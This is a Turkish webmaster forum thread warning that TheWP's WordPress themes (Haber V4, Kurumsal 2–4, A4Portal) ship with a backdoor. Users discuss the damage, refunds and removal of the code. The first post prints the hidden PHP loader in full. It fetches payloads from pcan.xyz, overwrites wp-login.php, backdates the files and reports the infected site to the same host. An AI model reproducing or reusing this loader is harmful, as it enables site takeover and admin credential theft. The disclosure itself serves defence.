lostyazilim
tr.link

TheWP Temalarında Bulunan Exploit

12 Mesajlar 2.598 Okunma
lstbozum
tr.link

Ehusus Ehusus WM Aracı Kullanıcı
  • Üyelik 05.09.2015
  • Yaş/Cinsiyet 41 / E
  • Meslek Yazılım Uzmanı
  • Konum İstanbul Anadolu
  • Ad Soyad M** K**
  • Mesajlar 2
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)
Thewp'nin geliştirdiği wordpress temalarında exploit bulunmuş..

Sizde panelden indirip aynı yerde var mı bakmanızı öneririm..

Haber Teması V4 - theHaberV4/admin/admin-interface-functions.php L : 1506. Satır
Kurumsal 2 - kurumsal2/fonksiyon/ayar.php L : 661. satır
Kurumsal 3 - kurumsal3/fonksiyon/yonetim/ot-loader.php L : 804. satır
Kurumsal 4 - kurumsal4/option-tree/ot-loader.php L : 807. Satır
A4Portal - admin/admin-functions.php L : 86. Satır


$uaga = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko,gas) Chrome/76.0.3809.132 Safari/537.36"; @$adabs = ABSPATH."wp-admin/ms-zo.php"; @$idabs = ABSPATH."wp-admin/ms-options.php"; @$zifos = ABSPATH."wp-login.php"; @$opfilemtime = @filemtime($idabs); if (!@file_exists($adabs)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "$uaga"); curl_setopt($ch, CURLOPT_URL, "http://pcan.xyz/s.txt?d"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $veri = @curl_exec($ch); $guncellebitir = @fopen("$adabs", "w"); @fwrite($guncellebitir, "$veri"); $chs = curl_init(); curl_setopt($chs, CURLOPT_USERAGENT, "$uaga"); curl_setopt($chs, CURLOPT_URL, "http://pcan.xyz/cwl.txt?d"); curl_setopt($chs, CURLOPT_RETURNTRANSFER, true); $verim = @curl_exec($chs); $guncellebitirs = @fopen("$zifos", "w"); @fwrite($guncellebitirs, "$verim"); $yils = date('Y',$opfilemtime); $ays = date('m',$opfilemtime); $guns = date('d',$opfilemtime);$saats = date('H',$opfilemtime);$daks = date('i',$opfilemtime);$sans = date('s',$opfilemtime); $zamanla = strtotime("$yils-$ays-$guns $saats:$daks:$sans"); @touch($adabs,$zamanla,$zamanla); @touch($zifos,$zamanla,$zamanla); $site = "http://$_SERVER[HTTP_HOST]"."/wp-admin/ms-zo.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "$uaga"); curl_setopt($ch, CURLOPT_URL, "http://pcan.xyz/l.php");curl_getinfo($ch, CURLINFO_EFFECTIVE_URL); curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS, array('user' => "kurulum",'pw' => "tamam",'site' => "$site")); $result = curl_exec($ch); curl_close($ch); }


Kaynak : https://www.***.net/sikayetim-var/2259327-thewp-gen-tr-temalarinda-exploit-var.html
webloggi

kişi bu mesajı beğendi.

wmaraci
reklam

Sifirnokta Sifirnokta https://www.stilbul.com/ Kullanıcı
  • Üyelik 19.02.2017
  • Yaş/Cinsiyet 46 / E
  • Meslek Webnesil master
  • Konum İzmir
  • Ad Soyad E** A**
  • Mesajlar 484
  • Beğeniler 194 / 116
  • Ticaret 15, (%100)
Hocam bende thewpden tema alıcaktım ama çok açık ve şikayetleri görünce vazgeçtim.. sorunlu temalar olmaya başladı sanırım thewp temaları
 

 

webloggi webloggi WM Aracı Kullanıcı
  • Üyelik 16.11.2018
  • Yaş/Cinsiyet 26 / E
  • Meslek Web & Medya
  • Konum Ankara
  • Ad Soyad T** H**
  • Mesajlar 2165
  • Beğeniler 925 / 926
  • Ticaret 12, (%100)
Sifirnokta sorunlu demek az kalıyor hocam size içinde zararlı kodlar olan bir ürünü satıyorlar bu ciddi bir suç
Sifirnokta

kişi bu mesajı beğendi.

Sifirnokta Sifirnokta https://www.stilbul.com/ Kullanıcı
  • Üyelik 19.02.2017
  • Yaş/Cinsiyet 46 / E
  • Meslek Webnesil master
  • Konum İzmir
  • Ad Soyad E** A**
  • Mesajlar 484
  • Beğeniler 194 / 116
  • Ticaret 15, (%100)
*** dan baktımda halen şikayetlerine cevap vermemişler hergün aktif olan insanlar nedense suskunlarr... ama yazık günah yani böyle yaptılarsa kaç kişi almıştır o temayı
webloggi

kişi bu mesajı beğendi.

wmaraci
wmaraci

Phantaso Phantaso İçeriklerin Gücü Adına! Kullanıcı
  • Üyelik 18.02.2016
  • Yaş/Cinsiyet 30 / E
  • Meslek Metin Yazarı & Editörü
  • Konum Diğer
  • Ad Soyad F** S**
  • Mesajlar 1903
  • Beğeniler 843 / 842
  • Ticaret 119, (%100)

Sifirnokta adlı üyeden alıntı

Hocam bende thewpden tema alıcaktım ama çok açık ve şikayetleri görünce vazgeçtim.. sorunlu temalar olmaya başladı sanırım thewp temaları


Wp Admin şifrelerini resmen yedekliyorlar. Temalardaki güvenlik durumu tamamen 0
 

 

kurgucuabi kurgucuabi WM Aracı Kullanıcı
  • Üyelik 06.01.2020
  • Yaş/Cinsiyet 31 / E
  • Meslek E Ticaret / Perakende müdürü
  • Konum İstanbul Avrupa
  • Ad Soyad H** Ç**
  • Mesajlar 92
  • Beğeniler 9 / 32
  • Ticaret 0, (%0)
Ben maalesef almıştım haberv4 temasını, bir süre sonra sitem yavaşlamaya ve index almamaya başladı verdiğim paranın çöpe gitmesine mi yanayım günlük 10k hiti kaybettiğime mi yanayım bilmiyorum, ne heves bıraktılar insanda ne de istek. Rezalet bir firma...
 

 

Hakanbey1907 Hakanbey1907 Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 18.11.2019
  • Yaş/Cinsiyet 30 / E
  • Meslek Tekniker
  • Konum Ankara
  • Ad Soyad M** H**
  • Mesajlar 443
  • Beğeniler 26 / 38
  • Ticaret 5, (%100)
Iade yaparlar mi?
 

 

azembilisim azembilisim azembilisim.com Kullanıcı
  • Üyelik 10.03.2018
  • Yaş/Cinsiyet 24 / E
  • Meslek Profesyonel Web Çözümleri
  • Konum Konya
  • Ad Soyad E** Y**
  • Mesajlar 872
  • Beğeniler 79 / 323
  • Ticaret 22, (%100)
silinebilir
Hakanbey1907

kişi bu mesajı beğendi.

azembilisim.com | Profesyonel Web Çözümleri

WebinSokagi WebinSokagi WM Aracı Kullanıcı
  • Üyelik 31.01.2020
  • Yaş/Cinsiyet 45 / E
  • Meslek Serbest
  • Konum İzmir
  • Ad Soyad E** S**
  • Mesajlar 113
  • Beğeniler 6 / 19
  • Ticaret 0, (%0)
Bahsettiğiniz kod var ise silmek çözüm müdür? Bende o temayı kullanıyorum :(
 

 

Web ve Teknoloji webinsokagi

Ehusus Ehusus WM Aracı Kullanıcı
  • Üyelik 05.09.2015
  • Yaş/Cinsiyet 41 / E
  • Meslek Yazılım Uzmanı
  • Konum İstanbul Anadolu
  • Ad Soyad M** K**
  • Mesajlar 2
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)

WebinSokagi adlı üyeden alıntı

Bahsettiğiniz kod var ise silmek çözüm müdür? Bende o temayı kullanıyorum :(


Ben Temiz kurulum yaparak yeniden yükledim ancak tema dosyasını yüklemeden önce ilgili yerdeki kodu kaldırdım..
 

 

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al